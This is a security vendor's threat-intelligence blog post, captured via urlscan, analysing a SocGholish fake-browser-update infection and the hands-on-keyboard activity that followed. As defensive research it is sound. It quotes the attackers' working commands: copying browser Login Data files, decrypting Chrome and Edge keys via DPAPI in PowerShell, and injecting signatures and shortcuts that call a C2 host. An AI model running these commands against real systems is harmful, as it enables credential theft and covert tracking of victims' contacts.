www.esentire.com
Open in
urlscan Pro
104.20.163.46
Public Scan
URL:
https://www.esentire.com/blog/socgholish-sets-sights-on-victim-peers
Submission: On May 13 via manual from GB — Scanned from GB
Submission: On May 13 via manual from GB — Scanned from GB
Form analysis 0 forms found in the DOM
Text Content
BLOG
SOCGHOLISH SETS SIGHTS ON VICTIM PEERS
BY eSentire Threat Response Unit (TRU)
May 8, 2024 | 8 MINS READ
Attacks/Breaches
Threat Intelligence
Threat Response Unit
TRU Positive/Bulletin
WANT TO LEARN MORE ON HOW TO ACHIEVE CYBER RESILIENCE?
TALK TO AN EXPERT
Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are
staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate,
contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks
in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical
Threat Response and Advanced Threat Analytics driven by our Threat Response Unit
– the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a
recent threat investigation. We outline how we responded to the confirmed threat
and what recommendations we have going forward.
Here’s the latest from our TRU Team…
WHAT DID WE FIND?
In April 2024, eSentire's Threat Response Unit (TRU) identified and traced
hands-on-keyboard activity to a SocGholish infection initiated by a fake browser
update. The fake update used obfuscated JavaScript to evade detection and
establish a foothold in the environment.
Attackers used living-off-the-land techniques to collect sensitive credentials
and notably, configured web beacons in both email signatures and network shares
to map out local and business-to-business relationships. This behavior would
suggest an interest in exploiting these relationships to target business peers
of interest.
The infection began when the user visited a compromised website and downloaded a
fake browser update named "Update.js," disguised as a JavaScript file (MD5:
44a0b845b30dcdc26c8017a6714c46e9).
The compromised webpage contained injected JavaScript (Figure 1), and the link
led to obfuscated JavaScript code (Figure 2).
Figure 1: Injected JavaScript Figure 2: Snippet of the obfuscated JavaScript
The snippet of the deobfuscated script is shown below (Figure 3).
Figure 3: Deobfuscated script
The script first checks if the browser is controlled by automation tools, such
as Selenium, using the “navigator.webdriver” property. If this property is true,
indicating that the browser might be under script or automation control, it
triggers a function to load a script from a specified SocGholish URL and then
terminates (lines 8-12). This behavior is highly likely designed to evade
automated analysis and detection.
Next, the script checks whether the browser window has been manipulated
significantly (e.g., if the difference between the outer and inner height or
width of the window is unusually large). This can indicate an attempt to detect
if it’s running in a potentially monitored or unconventional environment. If the
manipulation is detected, it loads another script from a different URL (lines
14-21).
Additionally, the script examines whether the user is logged into a WordPress
site by searching for specific cookie identifiers like “wordpress_logged_in” or
“wp-settings”. If these cookies are detected, the script refrains from executing
any further actions (lines 23-27).
If none of the mentioned conditions trigger, the script sets up an event
listener for mouse movements. Upon the first mouse movement detected, it removes
this listener and loads another script from yet another URL. This is possibly a
technique to only trigger script loading after user interaction, which can help
bypass certain types of detection mechanisms that look for malicious activity
upon page load (lines 32-37).
The _0x4d8183 function (lines 40-47) is dynamically used to insert a script
element into the webpage. This function takes a URL as an argument, creates a
<script> element, sets its src attribute to the provided URL, and appends it to
the first script tag found in the document. This method of script injection
allows external code to be run within the webpage context.
The example of URLs provided in the script are:
* hxxps://ghost.blueecho88[.]com/XnkKYSVbaQg6WzBTaU0mQy0NbxF8QygRLBxpCTsaYT40ClUHLBZkFTsLeA4sWyZDOwt4DixbMFByW3hDZFtvBy4JbEMj
* hxxps://ghost.blueecho88[.]com/U5WuWyi3zTI3t5RpZKGCeSDhyytxr4wrIfDNMzb2xQQ55vE9IfrALzbn3DQht4J5NufcNCG3lGl/t9x5abfKNz3wxDAl/cw3NeXXPDG30w==
* hxxps://ghost.blueecho88[.]com/gcGKZ/rj6Q7l47BVtvWmRfK17xej+6gG76DmHvuk1QHx46ZF8+OwReumqBo=
These are triggered under specific conditions in the script that have been
mentioned, executing external code when certain criteria are met, such as the
detection of automation tools or particular user interactions.
The downloaded malicious Update.js file contains an obfuscated JavaScript
(Figure 4).
Figure 4: Contents of Update.js
The script makes a POST request to the URL
hxxps://tfuq.register.arpsychotherapy[.]com/editContent. The “send” method sends
the request to the server with data
“lpZw+wmbGiagWaoqNM/HmfLjMBYLsTv26io31cysSA==” (Figure 5).
Figure 5: Deobfuscated Update.js
Post-exploitation Activity
17 minutes after the malicious JavaScript payload was executed by the user, we
identified hands-on-keyboard activity on the victim asset. This activity
included stored password extraction, decryption, and reconnaissance.
Password Store Extraction
The threat actors extracted saved login data from Microsoft Edge and Google
Chrome and copied them to a temporary file for exfiltration using the following
commands:
* "C:\Windows\System32\cmd.exe" /C type
"C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data"
>> "C:\Users\username\AppData\Local\Temp\2\radC7958.tmp"
* "C:\Windows\System32\cmd.exe" /C type
"C:\Users\username\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"
>> "C:\Users\username\AppData\Local\Temp\2\rad01734.tmp"
Shortly after, another command was run to copy login data files from both Edge
and Chrome browsers to a different user's Downloads directory, then log activity
or errors to a temporary file (username – is the primary infected user,
usename_2 is another user on the same machine):
* "C:\Windows\System32\cmd.exe" /C copy
"C:\Users\username\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"
C:\users\username_2 \Downloads\0395edg.bin©
"C:\Users\username\AppData\Local\Google\Chrome\User Data\Default\Login Data"
C:\users\username_2\Downloads\0396chr.bin >>
"C:\Users\username\AppData\Local\Temp\2\rad5914F.tmp"
Staging the credential data under another user is likely done for redundancy
purposes in case the main files are discovered.
Encryption Key Retrieval
Next, the threat actors attempted to run a base64-encoded command via
PowerShell. The decoded command retrieves and decrypts Edge’s and Chrome's
encryption keys for passwords and cookies using the DPAPI (Data Protection API)
and outputs the results in a temporary file.
The decoded commands:
* "C:\Windows\System32\cmd.exe" /C powershell -enc $1 = (gc
"$env:LOCALAPPDATA\Google\Chrome\User Data\Local State").split(',')|
select-string encrypted_key; $2 = $1 -replace '"}', '' -replace
'"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 =
[System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 =
[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4
>> "C:\Users\username\AppData\Local\Temp\2\rad1F269.tmp"
* "C:\Windows\System32\cmd.exe" /C powershell -enc $1 = (gc
"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Local State").split(',')|
select-string encrypted_key; $2 = $1 -replace '"}', '' -replace
'"encrypted_key":"','';Add-Type -AssemblyName System.Security;;$3 =
[System.Convert]::FromBase64String($2);$3 = $3[5..($3.length-1)];$4 =
[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser);$4
>> "C:\Users\username\AppData\Local\Temp\2\rad65036.tmp"
Python Script Execution
Subsequently, the threat actors attempted to execute and run the PowerShell
command 10 times, which performs several operations related to downloading,
extracting, and setting up a portable version of Python on an infected machine
under the “AppDataLocalConnectedDevicesPlatform” path to possibly run additional
Python payloads.
* powershell -c "wget
https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip
-OutFile
C:\Users\username\AppData\Local\ConnectedDevicesPlatform\python.zip;ls
C:\Users\ username
\AppData\Local\ConnectedDevicesPlatform\python.zip;Expand-Archive
-LiteralPath C:\Users\ username
\AppData\Local\ConnectedDevicesPlatform\python.zip -DestinationPath C:\Users\
username \AppData\Local\ConnectedDevicesPlatform\pypa;rm C:\Users\ username
\AppData\Local\ConnectedDevicesPlatform\python.zip;ls C:\Users\ username
\AppData\Local\ConnectedDevicesPlatform\pypa;wget
https://bootstrap.pypa.io/get-pip.py -OutFile C:\Users\ username
\AppData\Local\ConnectedDevicesPlatform\pypa\get-pip.py;cd C:\Users\ username
\AppData\Local\ConnectedDevicesPlatform\pypa;mkdir DLLs;ren python312._pth
python312.pth"
Email Contact Reconnaissance
The threat actors then ran a base64-encoded command via Powershell to modify
HTML signature files used by Microsoft Outlook.
* "C:\Windows\System32\cmd.exe" /C powershell.exe -encodedCommand Get-ChildItem
-Path $env:APPDATA\Microsoft\Signatures -Filter *.htm | ForEach-Object {
(Get-Content $_.FullName) -replace '</body>', "`r`n<img
src=`"file://170.130.55[.]72/logocompany.jpeg`">`r`n</body>" | Set-Content
$_.FullName } >> "C:\Users\username\AppData\Local\Temp\2\rad1F1BD.tmp"
The command lists above all HTML (.htm) files in the directory used for storing
Microsoft Outlook email signatures and replaces the </body> tag with a modified
version that includes an <img> tag right before the original </body> tag. This
<img> tag inserts an image from a remote server (specified by the URL in the
command). The command then redirects any output from the PowerShell command to a
temporary file for logging purposes.
The exact purpose of this command is unknown, but we assume it’s potentially
used to track when and where emails are opened. Each time the email is opened,
the image is loaded from the external server, allowing the attacker to collect
IP addresses, timestamps, and potentially other details about the recipient's
environment.
Network Discovery
The threat actors then listed the members of the “domain users” group in a
domain environment by running the C:\Windows\system32\net1 group "domain users"
/domain command.
The last command is responsible for creating the shortcuts within the network
share. The target path points to the network share location. The shortcut icon
points to the SocGholish C2 server 170.130.55[.]72/Documentation.ico.
* "C:\Windows\System32\cmd.exe" /C powershell $W = New-Object -comObject
WScript.Shell;$S =
$W.CreateShortcut('\\<REDACTED>\Documentation.lnk');$S.TargetPath =
'\\<REDACTED>';$S.IconLocation =
'\\170.130.55[.]72\Documentation.ico';$S.Save() >>
"C:\Users\username\AppData\Local\Temp\2\rad69C33.tmp"
Again, the purpose of this command is unknown. But we assume it is a similar
case with the email signature mentioned above for monitoring purposes as each
time the shortcut files are opened, the request is sent to the C2 server to
fetch the icon file.
The SocGholish intrusion campaign showcased a social engineering approach to
first gain entry through fake updates and then initiate a series of scripted
actions to extract sensitive data and monitor user interactions.
WHAT DID WE DO?
Our team of 24/7 SOC Cyber Analysts isolated the affected host and notified the
customer of suspicious activities.
WHAT CAN YOU LEARN FROM THIS TRU POSITIVE?
* The initial infection vector being a drive-by download disguised as a
legitimate browser update highlights the critical need for user education
about the risks associated with downloading files from unverified or
suspicious sources.
* The extraction and manipulation of sensitive data, such as login information
from browsers and modifying email signatures for potentially monitoring
interactions, underline the importance of comprehensive monitoring of network
behavior and the analysis of unusual activities that could indicate a host
compromise.
* The use of encoded PowerShell scripts to decrypt stored passwords and the
setting up of a portable Python environment for further malicious activities
stresses the importance of understanding post-exploitation behaviors and
potential indicators of compromise to better defend against and respond to
intrusions.
RECOMMENDATIONS FROM OUR THREAT RESPONSE UNIT (TRU):
We recommend implementing the following controls to help secure your
organization against SocGholish malware:
* Confirm that all devices are protected with Endpoint Detection and Response
(EDR) solutions.
* Implement a Phishing and Security Awareness Training (PSAT) Program that
educates and informs your employees on emerging threats in the threat
landscape.
* Encourage your employees to use password managers instead of using the
password storage feature provided by web browsers. Use master passwords where
applicable.
* We recommend modifying the default 'open-with' settings for script files,
ensuring they open with a basic text editor like Notepad instead of
executing.
INDICATORS OF COMPROMISE
You can access the indicators here.
ESENTIRE THREAT RESPONSE UNIT (TRU)
The eSentire Threat Response Unit (TRU) is an industry-leading threat research
team committed to helping your organization become more resilient. TRU is an
elite team of threat hunters and researchers that supports our 24/7 Security
Operations Centers (SOCs), builds threat detection models across the eSentire
XDR Cloud Platform, and works as an extension of your security team to
continuously improve our Managed Detection and Response service. By providing
complete visibility across your attack surface and performing global threat
sweeps and proactive hypothesis-driven threat hunts augmented by original threat
research, we are laser-focused on defending your organization against known and
unknown threats.
READ THE LATEST FROM ESENTIRE
May 08, 2024
FIN7 USES TRUSTED BRANDS AND SPONSORED GOOGLE ADS TO DISTRIBUTE MSIX…
Learn More
May 08, 2024
SOCGHOLISH SETS SIGHTS ON VICTIM PEERS
Learn More
May 06, 2024
WELDING THE WEAK SPOTS: STRENGTHENING MANUFACTURING CYBERSECURITY…
Learn More
Cookies allow us to deliver the best possible experience for you on our website
- by continuing to use our website or by closing this box, you are consenting to
our use of cookies. Visit our Privacy Policy to learn more.
Accept
ARE YOU EXPERIENCING A SECURITY INCIDENT OR HAVE YOU BEEN BREACHED?
Call 1-866-579-2200
THE PROVEN CHOICE FOR
MANAGED DETECTION AND RESPONSE
GET STARTED → PARTNER LOGIN →
SALES AND
CUSTOMER SUPPORT
NORTH AMERICA 1-866-579-2200 EMEA (0)8000-443242 ANZ/APAC 1-519-651-2200
WHAT WE DO
Managed Detection and Response Digital Forensics and Incident Response Exposure
Management Services Extended Detection and Response (XDR) Security Operations
Center (SOC) Threat Response Unit (TRU) Cyber Resilience Team MDR for Microsoft
MDR for AWS Response and Remediation MDR Pricing
HOW WE DO IT
Network Endpoint Log Cloud Insider Threat
INDUSTRIES
Insurance Construction Finance Legal Manufacturing Private Equity Healthcare
Retail Food Supply Government and Education
USE CASES
Ransomware Third-Party Risk Sensitive Data Security Cloud Misconfiguration Zero
Day Attacks Cyber Risk Cybersecurity Compliance Do More With Less Cyber
Insurance
RESOURCES
Security Advisories Blog Resource Library Video Library TRU Intelligence Center
Case Studies Switch to eSentire Real vs Fake MDR Cybersecurity Glossary
TOOLS
Cybersecurity Assessment MDR ROI Calculator SOC Calculator MITRE ATT&CK® Tool
COMPANY
About Us Leadership Newsroom Event Calendar Careers Partners Australia & New
Zealand United Kingdom
2024 eSentire, Inc. All Rights Reserved.
Sitemap Terms and Conditions Privacy Policy Accessibility Legal
Get Started
What We Do
How We Do It
Resources
Company
Partners
Get Started
What we do
How we do it
Resources
Company
Partners
Get Started